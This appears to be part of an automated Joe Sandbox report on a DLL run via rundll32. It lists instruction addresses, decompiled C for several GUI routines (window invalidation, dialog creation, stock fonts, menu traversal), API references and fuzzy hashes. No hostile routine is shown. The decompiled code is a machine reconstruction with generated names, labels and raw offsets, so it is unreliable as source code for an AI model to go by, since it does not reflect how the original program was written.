                                                                                                        0x10032fcf
                                                                                                        0x10032fcd
                                                                                                        0x10032fe2
                                                                                                        0x10032feb
                                                                                                        0x10032ff1
                                                                                                        0x10033005
                                                                                                        0x10033008
                                                                                                        0x1003300a
                                                                                                        0x1003300c
                                                                                                        0x10033015
                                                                                                        0x10033017
                                                                                                        0x10033019
                                                                                                        0x10033019
                                                                                                        0x10033019
                                                                                                        0x1003300e
                                                                                                        0x1003300e
                                                                                                        0x1003300e
                                                                                                        0x1003300c
                                                                                                        0x10032ff3
                                                                                                        0x10032ff5
                                                                                                        0x10032ffe
                                                                                                        0x10033000
                                                                                                        0x10033002
                                                                                                        0x10033002
                                                                                                        0x10032ff7
                                                                                                        0x10032ff7
                                                                                                        0x10032ff7
                                                                                                        0x10032ff5
                                                                                                        0x10032ff1
                                                                                                        0x1003301e
                                                                                                        0x10033063
                                                                                                        0x10033065
                                                                                                        0x10033089
                                                                                                        0x1003308f
                                                                                                        0x10033092
                                                                                                        0x10033095
                                                                                                        0x1003309c
                                                                                                        0x1003309f
                                                                                                        0x100330a9
                                                                                                        0x100330a9
                                                                                                        0x100330a9
                                                                                                        0x100330ad
                                                                                                        0x100330ad
                                                                                                        0x100330b0
                                                                                                        0x100330b3
                                                                                                        0x100330ba
                                                                                                        0x100330bd
                                                                                                        0x100330c7
                                                                                                        0x100330c7
                                                                                                        0x100330c7
                                                                                                        0x100330cb
                                                                                                        0x100330d2
                                                                                                        0x100330d4
                                                                                                        0x100330d7
                                                                                                        0x100330d9
                                                                                                        0x100330e6
                                                                                                        0x100330e8
                                                                                                        0x100330e8
                                                                                                        0x100330e9
                                                                                                        0x100330e9
                                                                                                        0x100330eb
                                                                                                        0x100330f8
                                                                                                        0x100330fa
                                                                                                        0x100330fa
                                                                                                        0x100330fb
                                                                                                        0x1003310b
                                                                                                        0x10033116
                                                                                                        0x10033130
                                                                                                        0x10033135
                                                                                                        0x10033139
                                                                                                        0x1003313b
                                                                                                        0x1003313e
                                                                                                        0x10033141
                                                                                                        0x10033154
                                                                                                        0x10033143
                                                                                                        0x10033147
                                                                                                        0x10033147
                                                                                                        0x1003315d
                                                                                                        0x10033171
                                                                                                        0x00000000
                                                                                                        0x1003317c
                                                                                                        0x100330ed
                                                                                                        0x100330f2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100330f4
                                                                                                        0x00000000
                                                                                                        0x100330f4
                                                                                                        0x100330db
                                                                                                        0x100330e0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100330e2
                                                                                                        0x00000000
                                                                                                        0x100330e2
                                                                                                        0x100330bf
                                                                                                        0x100330bf
                                                                                                        0x100330c2
                                                                                                        0x100330c2
                                                                                                        0x00000000
                                                                                                        0x100330c2
                                                                                                        0x100330b5
                                                                                                        0x00000000
                                                                                                        0x100330b5
                                                                                                        0x100330a1
                                                                                                        0x100330a1
                                                                                                        0x100330a4
                                                                                                        0x100330a4
                                                                                                        0x00000000
                                                                                                        0x100330a4
                                                                                                        0x10033097
                                                                                                        0x00000000
                                                                                                        0x10033097
                                                                                                        0x00000000
                                                                                                        0x1003306a
                                                                                                        0x10033028
                                                                                                        0x1003302e
                                                                                                        0x10033036
                                                                                                        0x10033043
                                                                                                        0x10033049
                                                                                                        0x1003304c
                                                                                                        0x10033051
                                                                                                        0x10033057
                                                                                                        0x10033057
                                                                                                        0x1003305a
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cursor$Window$CaptureKillLoadParentRectReleaseTimerUpdate
                                                                                                        • String ID:
                                                                                                        • API String ID: 2135910768-0
                                                                                                        • Opcode ID: 9f198ea6b06c1f53964a0dec54738a3dea3d1376fd2faf82cfe833c5848d3e85
                                                                                                        • Instruction ID: 25c125244b2828e789b43927dcdcd2e2d52d321b5a7084e5742444ac35df19d6
                                                                                                        • Opcode Fuzzy Hash: 9f198ea6b06c1f53964a0dec54738a3dea3d1376fd2faf82cfe833c5848d3e85
                                                                                                        • Instruction Fuzzy Hash: F5519F31A04106AFDB1ADFA4C8E9AAE77F5FB44342F218429E906EB391D734ED41DB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002BDA5, Relevance: 15.1, APIs: 10, Instructions: 96COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1002BDA5(void* __ecx, int _a4) {
				int _v8;
				struct tagRECT _v24;
				long _t39;
				int _t42;
				int _t43;
				int _t62;
				int _t66;
				void* _t68;
				long _t69;
				int _t71;

				_t69 = _a4;
				_t68 = __ecx;
				_t39 = DefWindowProcA( *(__ecx + 0x20), 0x46, 0, _t69);
				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
					GetWindowRect( *(_t68 + 0x20),  &_v24);
					_t42 = _a4;
					_t66 =  *(_t42 + 0x10);
					_t71 = _v24.right - _v24.left;
					_t62 = _v24.bottom - _v24.top;
					_t43 =  *(_t42 + 0x14);
					_v8 = _t66;
					_a4 = _t43;
					if(_t66 != _t71 && ( *(_t68 + 0x80) & 0x00000400) != 0) {
						SetRect( &_v24, _t66 -  *0x10099120, 0, _t66, _t43);
						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
						SetRect( &_v24, _t71 -  *0x10099120, 0, _t71, _a4);
						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
						_t66 = _v8;
						_t43 = _a4;
					}
					if(_t43 != _t62 && ( *(_t68 + 0x80) & 0x00000800) != 0) {
						SetRect( &_v24, 0, _t43 -  *0x10099124, _t66, _t43);
						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
						SetRect( &_v24, 0, _t62 -  *0x10099124, _v8, _t62);
						_t43 = InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
					}
					return _t43;
				}
				return _t39;
			}













                                                                                                        0x1002bdac
                                                                                                        0x1002bdb3
                                                                                                        0x1002bdba
                                                                                                        0x1002bdc4
                                                                                                        0x1002bdd2
                                                                                                        0x1002bdd8
                                                                                                        0x1002bdde
                                                                                                        0x1002bde1
                                                                                                        0x1002bde7
                                                                                                        0x1002bdec
                                                                                                        0x1002bdef
                                                                                                        0x1002bdf2
                                                                                                        0x1002bdf5
                                                                                                        0x1002be11
                                                                                                        0x1002be20
                                                                                                        0x1002be37
                                                                                                        0x1002be46
                                                                                                        0x1002be4c
                                                                                                        0x1002be4f
                                                                                                        0x1002be4f
                                                                                                        0x1002be54
                                                                                                        0x1002be76
                                                                                                        0x1002be81
                                                                                                        0x1002be98
                                                                                                        0x1002bea3
                                                                                                        0x1002bea3
                                                                                                        0x00000000
                                                                                                        0x1002bea9
                                                                                                        0x1002bead

                                                                                                        APIs
                                                                                                        • DefWindowProcA.USER32(?,00000046,00000000,?), ref: 1002BDBA
                                                                                                        • GetWindowRect.USER32 ref: 1002BDD2
                                                                                                        • SetRect.USER32 ref: 1002BE11
                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002BE20
                                                                                                        • SetRect.USER32 ref: 1002BE37
                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002BE46
                                                                                                        • SetRect.USER32 ref: 1002BE76
                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002BE81
                                                                                                        • SetRect.USER32 ref: 1002BE98
                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002BEA3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$Invalidate$Window$Proc
                                                                                                        • String ID:
                                                                                                        • API String ID: 570070710-0
                                                                                                        • Opcode ID: 97afb3ad9f55a30b7bc3532130c531b972377fdf4c94535283d23edbb78eaea5
                                                                                                        • Instruction ID: 61371ef8346fa296272de4c130f90a8bd45dfee07fb1d4490de320c05c370245
                                                                                                        • Opcode Fuzzy Hash: 97afb3ad9f55a30b7bc3532130c531b972377fdf4c94535283d23edbb78eaea5
                                                                                                        • Instruction Fuzzy Hash: F6310C7290061ABFEB14DFA4CD88FAE7BBDFB08344F110115FA45A61A0D770AE14CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10009F04, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 97%
                                                                                                        			E10009F04(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t65;
				signed int _t72;
				signed int _t74;
				struct HWND__* _t75;
				signed int _t78;
				signed int _t95;
				intOrPtr* _t103;
				signed int _t110;
				void* _t124;
				signed int _t129;
				DLGTEMPLATE* _t130;
				struct HWND__* _t131;
				void* _t132;

				_t128 = __esi;
				_t124 = __edx;
				_t104 = __ecx;
				_push(0x3c);
				E1003EEB5(0x100530fc, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
				_t136 =  *(_t132 + 0x10);
				if( *(_t132 + 0x10) == 0) {
					 *(_t132 + 0x10) =  *(E1000AB19(__ecx, 0, __esi, _t136) + 0xc);
				}
				_t129 =  *(E1000AB19(_t103, 0, _t128, _t136) + 0x3c);
				 *(_t132 - 0x28) = _t129;
				 *(_t132 - 0x14) = 0;
				 *(_t132 - 4) = 0;
				E1001120A(_t103, _t104, 0, _t129, _t136, 0x10);
				E1001120A(_t103, _t104, 0, _t129, _t136, 0x7c000);
				if(_t129 == 0) {
					_t130 =  *(_t132 + 8);
					L7:
					__eflags = _t130;
					if(_t130 == 0) {
						L4:
						_t65 = 0;
						L32:
						return E1003EF21(_t65);
					}
					E10001DB0(_t132 - 0x1c, E10007F7E());
					 *(_t132 - 4) = 1;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					__eflags = E1002AB2C(_t103, 0, _t132, __eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
					__eflags =  *0x10099164; // 0x0
					_t72 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t72;
						if(__eflags == 0) {
							L17:
							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
							E1001034E(0, __eflags, _t103);
							_t74 =  *(_t132 + 0xc);
							__eflags = _t74;
							if(_t74 != 0) {
								_t75 =  *(_t74 + 0x20);
							} else {
								_t75 = 0;
							}
							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E1000998B, 0);
							E10001280( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
							_t110 =  *(_t132 - 0x28);
							__eflags = _t110;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
								__eflags = _t131;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t103 + 0x12c))(0);
								}
							}
							_t78 = E1000E68D(_t103, 0, __eflags);
							__eflags = _t78;
							if(_t78 == 0) {
								 *((intOrPtr*)( *_t103 + 0x114))();
							}
							__eflags = _t131;
							if(_t131 != 0) {
								__eflags =  *(_t103 + 0x3c) & 0x00000010;
								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
									DestroyWindow(_t131);
									_t131 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t132 - 0x14);
							if( *(_t132 - 0x14) != 0) {
								GlobalUnlock( *(_t132 - 0x14));
								GlobalFree( *(_t132 - 0x14));
							}
							__eflags = _t131;
							_t59 = _t131 != 0;
							__eflags = _t59;
							_t65 = 0 | _t59;
							goto L32;
						}
						L15:
						E1002AAF5(_t103, _t132 - 0x38, 0, _t132, _t130);
						 *(_t132 - 4) = 2;
						E1002AA53(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
						 *(_t132 - 0x14) = E1002A78B(_t132 - 0x38);
						 *(_t132 - 4) = 1;
						E1002A77D(_t132 - 0x38);
						__eflags =  *(_t132 - 0x14);
						if(__eflags != 0) {
							_t130 = GlobalLock( *(_t132 - 0x14));
						}
						goto L17;
					}
					__eflags = _t72;
					if(_t72 != 0) {
						goto L15;
					}
					__eflags = GetSystemMetrics(0x2a);
					if(__eflags == 0) {
						goto L17;
					}
					_t95 = E10006D40(_t103, _t132 - 0x1c, 0, _t130, _t132, "MS Shell Dlg");
					__eflags = _t95;
					_t72 = 0 | _t95 == 0x00000000;
					__eflags = _t72;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t132 - 0x18)) - 8;
					if( *((short*)(_t132 - 0x18)) == 8) {
						 *((intOrPtr*)(_t132 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t132 - 0x48);
				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
					goto L7;
				}
				goto L4;
			}
















                                                                                                        0x10009f04
                                                                                                        0x10009f04
                                                                                                        0x10009f04
                                                                                                        0x10009f04
                                                                                                        0x10009f0b
                                                                                                        0x10009f10
                                                                                                        0x10009f12
                                                                                                        0x10009f17
                                                                                                        0x10009f1a
                                                                                                        0x10009f24
                                                                                                        0x10009f24
                                                                                                        0x10009f2c
                                                                                                        0x10009f31
                                                                                                        0x10009f34
                                                                                                        0x10009f37
                                                                                                        0x10009f3a
                                                                                                        0x10009f44
                                                                                                        0x10009f4b
                                                                                                        0x10009f78
                                                                                                        0x10009f7b
                                                                                                        0x10009f7b
                                                                                                        0x10009f7d
                                                                                                        0x10009f5f
                                                                                                        0x10009f5f
                                                                                                        0x1000a0ec
                                                                                                        0x1000a0f1
                                                                                                        0x1000a0f1
                                                                                                        0x10009f88
                                                                                                        0x10009f96
                                                                                                        0x10009f9a
                                                                                                        0x10009fa7
                                                                                                        0x10009fac
                                                                                                        0x10009fb2
                                                                                                        0x10009fb4
                                                                                                        0x10009fea
                                                                                                        0x10009fea
                                                                                                        0x10009fec
                                                                                                        0x1000a02d
                                                                                                        0x1000a02d
                                                                                                        0x1000a031
                                                                                                        0x1000a036
                                                                                                        0x1000a03b
                                                                                                        0x1000a03e
                                                                                                        0x1000a040
                                                                                                        0x1000a046
                                                                                                        0x1000a042
                                                                                                        0x1000a042
                                                                                                        0x1000a042
                                                                                                        0x1000a060
                                                                                                        0x1000a062
                                                                                                        0x1000a067
                                                                                                        0x1000a089
                                                                                                        0x1000a08c
                                                                                                        0x1000a08e
                                                                                                        0x1000a096
                                                                                                        0x1000a099
                                                                                                        0x1000a09b
                                                                                                        0x1000a0a2
                                                                                                        0x1000a0a2
                                                                                                        0x1000a09b
                                                                                                        0x1000a0a8
                                                                                                        0x1000a0ad
                                                                                                        0x1000a0af
                                                                                                        0x1000a0b5
                                                                                                        0x1000a0b5
                                                                                                        0x1000a0bb
                                                                                                        0x1000a0bd
                                                                                                        0x1000a0bf
                                                                                                        0x1000a0c3
                                                                                                        0x1000a0c6
                                                                                                        0x1000a0cc
                                                                                                        0x1000a0cc
                                                                                                        0x1000a0cc
                                                                                                        0x1000a0c3
                                                                                                        0x1000a0ce
                                                                                                        0x1000a0d1
                                                                                                        0x1000a0d6
                                                                                                        0x1000a0df
                                                                                                        0x1000a0df
                                                                                                        0x1000a0e7
                                                                                                        0x1000a0e9
                                                                                                        0x1000a0e9
                                                                                                        0x1000a0e9
                                                                                                        0x00000000
                                                                                                        0x1000a0e9
                                                                                                        0x10009fee
                                                                                                        0x10009ff2
                                                                                                        0x10009ffd
                                                                                                        0x1000a001
                                                                                                        0x1000a011
                                                                                                        0x1000a014
                                                                                                        0x1000a018
                                                                                                        0x1000a01d
                                                                                                        0x1000a020
                                                                                                        0x1000a02b
                                                                                                        0x1000a02b
                                                                                                        0x00000000
                                                                                                        0x1000a020
                                                                                                        0x10009fb6
                                                                                                        0x10009fb8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10009fc2
                                                                                                        0x10009fc4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10009fce
                                                                                                        0x10009fd5
                                                                                                        0x10009fda
                                                                                                        0x10009fdc
                                                                                                        0x10009fde
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10009fe0
                                                                                                        0x10009fe5
                                                                                                        0x10009fe7
                                                                                                        0x10009fe7
                                                                                                        0x00000000
                                                                                                        0x10009fe5
                                                                                                        0x10009f52
                                                                                                        0x10009f5d
                                                                                                        0x10009f74
                                                                                                        0x00000000
                                                                                                        0x10009f74
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 10009F0B
                                                                                                        • GetSystemMetrics.USER32 ref: 10009FBC
                                                                                                        • GlobalLock.KERNEL32 ref: 1000A025
                                                                                                        • CreateDialogIndirectParamA.USER32(?,?,?,1000998B,00000000), ref: 1000A054
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                        • String ID: MS Shell Dlg
                                                                                                        • API String ID: 1736106359-76309092
                                                                                                        • Opcode ID: 00eff9cbe39943637328a426b7797b3afdc7c3b1945d75ce353effab8c3cc5ae
                                                                                                        • Instruction ID: ef2fac96761e69f219d17246f0f3a23b79f49f0debd93612bc35c10ebe38fe1a
                                                                                                        • Opcode Fuzzy Hash: 00eff9cbe39943637328a426b7797b3afdc7c3b1945d75ce353effab8c3cc5ae
                                                                                                        • Instruction Fuzzy Hash: C751F33090020ADFEB15DFA4CC859EEBBB5EF45380F144669F802E7199DB309E80CB51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002AA53, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 95%
                                                                                                        			E1002AA53(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x10072650; // 0xb5e27fef
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E10039F21(E1002A904(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

















                                                                                                        0x1002aa59
                                                                                                        0x1002aa60
                                                                                                        0x1002aa65
                                                                                                        0x1002aa6e
                                                                                                        0x1002aa71
                                                                                                        0x1002aa74
                                                                                                        0x1002aa79
                                                                                                        0x1002aa7d
                                                                                                        0x1002aa87
                                                                                                        0x1002aa96
                                                                                                        0x1002aa9a
                                                                                                        0x1002aaa7
                                                                                                        0x1002aaa9
                                                                                                        0x1002aaab
                                                                                                        0x1002aaab
                                                                                                        0x1002aac6
                                                                                                        0x1002aac9
                                                                                                        0x1002aac9
                                                                                                        0x1002aacf
                                                                                                        0x1002aacf
                                                                                                        0x1002aad5
                                                                                                        0x1002aad7
                                                                                                        0x1002aad7
                                                                                                        0x1002aaf2
                                                                                                        0x1002aaf2
                                                                                                        0x1002aa81
                                                                                                        0x1002aa85
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetStockObject.GDI32(00000011), ref: 1002AA79
                                                                                                        • GetStockObject.GDI32(0000000D), ref: 1002AA81
                                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 1002AA8E
                                                                                                        • GetDC.USER32(00000000), ref: 1002AA9D
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002AAB1
                                                                                                        • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 1002AABD
                                                                                                        • ReleaseDC.USER32 ref: 1002AAC9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$Stock$CapsDeviceRelease
                                                                                                        • String ID: System
                                                                                                        • API String ID: 46613423-3470857405
                                                                                                        • Opcode ID: 25c80ee23c7fbc883c62e90c00c3747b1b3031c44122ec4f620ce27ed8e3d84c
                                                                                                        • Instruction ID: 9cbf8e9a3f447664e9375befc8fea994b37f0c25bf9610474acd094e2d94b04c
                                                                                                        • Opcode Fuzzy Hash: 25c80ee23c7fbc883c62e90c00c3747b1b3031c44122ec4f620ce27ed8e3d84c
                                                                                                        • Instruction Fuzzy Hash: 50119175600228EBEB10DBA1DD85FAE7BB8EF05781F40001AFA41FA180DB709E02CB61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100142CB, Relevance: 13.6, APIs: 9, Instructions: 142windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 88%
                                                                                                        			E100142CB(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t52;
				intOrPtr* _t53;
				struct HMENU__* _t57;
				int _t58;
				int _t59;
				struct HMENU__* _t60;
				int _t62;
				int _t64;
				signed int _t66;
				int _t67;
				struct HMENU__* _t68;
				int _t70;
				intOrPtr* _t74;
				intOrPtr* _t75;
				int _t76;
				int _t77;
				struct HMENU__* _t87;
				intOrPtr _t89;

				_t78 = __ecx;
				_t75 = __ecx;
				_v8 = __ecx;
				_t52 = E10029945( *((intOrPtr*)(__ecx + 0x20)));
				if(_a12 == 0) {
					_t53 = __ecx + 0x80;
					_t89 = _a4;
					if( *_t53 == 0) {
						L3:
						_t94 = _t89;
						if(_t89 == 0) {
							E1000836F(_t75, _t78, 0, _t89, _t94);
						}
						E10007A5B( &_v48);
						_v36 = _t89;
						if( *((intOrPtr*)(E1000A5E4(_t75, 0, _t89, _t94) + 0x78)) !=  *(_t89 + 4)) {
							_t57 = GetMenu( *(_t75 + 0x20));
							__eflags = _t57;
							if(_t57 == 0) {
								goto L16;
							}
							_t82 = _t75;
							_t68 = E1000FBCD(_t75, _t75, GetMenu);
							__eflags = _t68;
							if(_t68 == 0) {
								goto L16;
							}
							_t87 = GetMenu( *(_t68 + 0x20));
							__eflags = _t87;
							if(_t87 == 0) {
								goto L16;
							}
							_t70 = GetMenuItemCount(_t87);
							_t77 = 0;
							__eflags = _t70;
							_a12 = _t70;
							if(_t70 <= 0) {
								L15:
								_t75 = _v8;
								goto L16;
							} else {
								goto L11;
							}
							while(1) {
								L11:
								__eflags = GetSubMenu(_t87, _t77) -  *(_t89 + 4);
								if(__eflags == 0) {
									break;
								}
								_t77 = _t77 + 1;
								__eflags = _t77 - _a12;
								if(_t77 < _a12) {
									continue;
								}
								goto L15;
							}
							_push(_t87);
							_v12 = E1002AF88(_t77, _t82, _t87, _t89, __eflags);
							goto L15;
						} else {
							_v12 = _t89;
							L16:
							_t58 = GetMenuItemCount( *(_t89 + 4));
							_v40 = _v40 & 0x00000000;
							_v16 = _t58;
							if(_t58 <= 0) {
								L36:
								return _t58;
							}
							do {
								_t59 = GetMenuItemID( *(_t89 + 4), _v40);
								_v44 = _t59;
								if(_t59 == 0) {
									goto L35;
								}
								if(_t59 != 0xffffffff) {
									_v32 = _v32 & 0x00000000;
									__eflags =  *(_t75 + 0x54);
									if( *(_t75 + 0x54) == 0) {
										L27:
										_t60 = 0;
										__eflags = 0;
										L28:
										_push(_t60);
										L29:
										_push(_t75);
										E10007A81( &_v48);
										_t62 = GetMenuItemCount( *(_t89 + 4));
										_t76 = _t62;
										if(_t76 >= _v16) {
											L34:
											_v16 = _t76;
											_t75 = _v8;
											goto L35;
										}
										_v40 = _v40 + _t62 - _v16;
										while(_v40 < _t76) {
											_t64 = GetMenuItemID( *(_t89 + 4), _v40);
											__eflags = _t64 - _v44;
											if(_t64 != _v44) {
												goto L34;
											}
											_t43 =  &_v40;
											 *_t43 = _v40 + 1;
											__eflags =  *_t43;
										}
										goto L34;
									}
									__eflags = _t59 - 0xf000;
									if(_t59 >= 0xf000) {
										goto L27;
									}
									_t60 = 1;
									goto L28;
								}
								_t66 = E1000D005(_t89, _v40);
								_v32 = _t66;
								if(_t66 == 0) {
									goto L35;
								}
								_t67 = GetMenuItemID( *(_t66 + 4), 0);
								_v44 = _t67;
								if(_t67 != 0 && _t67 != 0xffffffff) {
									_push(0);
									goto L29;
								}
								L35:
								_v40 = _v40 + 1;
								_t58 = _v40;
							} while (_t58 < _v16);
							goto L36;
						}
					}
					_t74 =  *_t53;
					_t78 = _t74;
					_t58 =  *((intOrPtr*)( *_t74 + 0x74))(_t89, _a8, 0);
					if(_t58 != 0) {
						goto L36;
					}
					goto L3;
				}
				return _t52;
			}

































                                                                                                        0x100142cb
                                                                                                        0x100142d2
                                                                                                        0x100142d8
                                                                                                        0x100142db
                                                                                                        0x100142e5
                                                                                                        0x100142eb
                                                                                                        0x100142f4
                                                                                                        0x100142f7
                                                                                                        0x1001430f
                                                                                                        0x1001430f
                                                                                                        0x10014311
                                                                                                        0x10014313
                                                                                                        0x10014313
                                                                                                        0x1001431b
                                                                                                        0x10014320
                                                                                                        0x1001432e
                                                                                                        0x1001433e
                                                                                                        0x10014340
                                                                                                        0x10014342
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10014344
                                                                                                        0x10014346
                                                                                                        0x1001434b
                                                                                                        0x1001434d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10014354
                                                                                                        0x10014356
                                                                                                        0x10014358
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001435b
